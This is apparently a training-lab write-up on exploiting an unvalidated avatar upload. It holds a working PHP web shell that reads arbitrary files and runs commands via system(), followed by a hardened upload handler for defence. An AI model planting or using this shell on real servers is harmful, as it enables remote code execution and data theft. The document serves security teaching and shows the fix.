# Remote code execution via web shell upload

This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file `/home/carlos/secret`. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: `wiener:peter`

I actually had to use the walk-through on this one: log into the account you're given and upload your picture to the avatar. I did try to get a reverse shell, but I wasn't getting any response on [netcat](https://en.wikipedia.org/wiki/Netcat) with known file uploads.
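The web shell itself, as an added example (this is not the lab's code or the walk-through's file). Because the upload handler does no validation, a file named `shell.php` is stored with its extension intact and executed by the web server when its URL is requested. The avatar path `/files/avatars/shell.php` used in the comments is an assumption; take the real path from the `<img>` tag on your account page after uploading. Reading the target file from disk needs no outbound connection from the lab host, which is the usual reason a reverse shell gets no callback on a listener.

```php
<?php
// shell.php: minimal PHP web shell for the lab (added example, not from the original write-up).
//
// Usage once uploaded as the avatar (path assumed, check the avatar <img src> on your account page):
//   GET /files/avatars/shell.php                   -> contents of /home/carlos/secret
//   GET /files/avatars/shell.php?file=/etc/passwd  -> read another file
//   GET /files/avatars/shell.php?cmd=id            -> run a command, if system() is enabled

header('Content-Type: text/plain');

if (isset($_GET['cmd'])) {
    // Command execution branch. Only works if system() is not listed in disable_functions.
    if (function_exists('system')) {
        system($_GET['cmd']);
    } else {
        echo "system() is disabled on this host\n";
    }
    exit;
}

// Default branch: read the file the lab asks for, or any path given in ?file=.
$path = isset($_GET['file']) ? $_GET['file'] : '/home/carlos/secret';

if (!is_readable($path)) {
    // Report which uid the web server runs as, so a permission failure is diagnosable.
    $uid = function_exists('posix_geteuid') ? posix_geteuid() : 'unknown';
    echo "cannot read $path (effective uid: $uid)\n";
    exit;
}

echo file_get_contents($path);
```

Upload the file through the avatar form, then request the avatar URL directly; the response body is the secret to submit. The `?cmd=` branch is there to show what the same upload gives an attacker beyond one file read; it is not needed to solve the lab.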

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FoH5vVM6Bn2cqieHP6j2N%2Fimage.png?alt=media&#x26;token=bec84952-4bb4-4664-87b6-b49625b79e07" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FWt61iBSWBphnZ9nYZhrC%2Fimage.png?alt=media&#x26;token=c7ca061b-6bce-4b77-aebe-976668c858b4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FUUa7KaTrnNT1D9kkgzQv%2Fimage.png?alt=media&#x26;token=3e239494-81e4-4cb5-be1a-b3dba3b48dea" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FvdaBbrCZgouG94Cb5oeR%2Fimage.png?alt=media&#x26;token=3ac0ac8b-25cd-415f-8141-f6fb90bddf55" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FM4RywSS7l0ujKybpzXxB%2Fimage.png?alt=media&#x26;token=d2e55aa0-8c3a-42c7-bc51-cd8075a639b2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FxRs2yUfVIvGE4a5qqfVq%2Fimage.png?alt=media&#x26;token=9c38d060-1411-4e8f-9b23-98c49f85d60c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FKz7RIvbg2GHjrfbcouGM%2Fimage.png?alt=media&#x26;token=c9c5b7bd-52e3-40d0-abe8-870e1a445428" alt=""><figcaption></figcaption></figure>
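For contrast, the validation the lab's upload function is missing, as an added example (this is my code, not the lab's or PortSwigger's). The form field name `avatar`, the storage directory, and the size limit are assumptions chosen for illustration.

```php
<?php
// avatar_upload.php: a hardened avatar upload handler (added example, not the lab's code).
// Assumptions: form field "avatar", storage directory outside the document root,
// served back through a script-free static handler rather than as PHP.

const UPLOAD_DIR = '/var/www/uploads/avatars';  // not under the web root
const MAX_BYTES  = 1024 * 1024;                  // 1 MiB, assumed limit
const ALLOWED    = [                             // extension => expected MIME type
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

function store_avatar(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed: error ' . $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 1. Extension allowlist on the client-supplied name. shell.php is rejected here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // 2. Sniff the real MIME type from the bytes, not from the Content-Type header
    //    the client sent, and require it to match the extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }

    // 3. Require the file to decode as an image; getimagesize() returns false otherwise.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // 4. Never reuse the client's filename. A random name with the validated extension
    //    means no double extension (shell.php.png) or path fragment reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;

    // 5. move_uploaded_file() refuses any source that is not a genuine upload.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);  // readable, never executable
    return $name;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['avatar'])) {
    try {
        $stored = store_avatar($_FILES['avatar']);
        echo "stored as $stored\n";
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . $e->getMessage() . "\n";
    }
}
```

Each check closes a different bypass from the same lab series: the allowlist blocks the `.php` name, the sniffed MIME type blocks a renamed script, and the random filename blocks double-extension and path tricks. None of the content checks stop a genuine image with PHP hidden in its metadata, which is why the directory itself must never be served through the PHP handler (for example, `php_admin_flag engine off` on that directory in Apache, or storing it outside the web root as assumed above).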
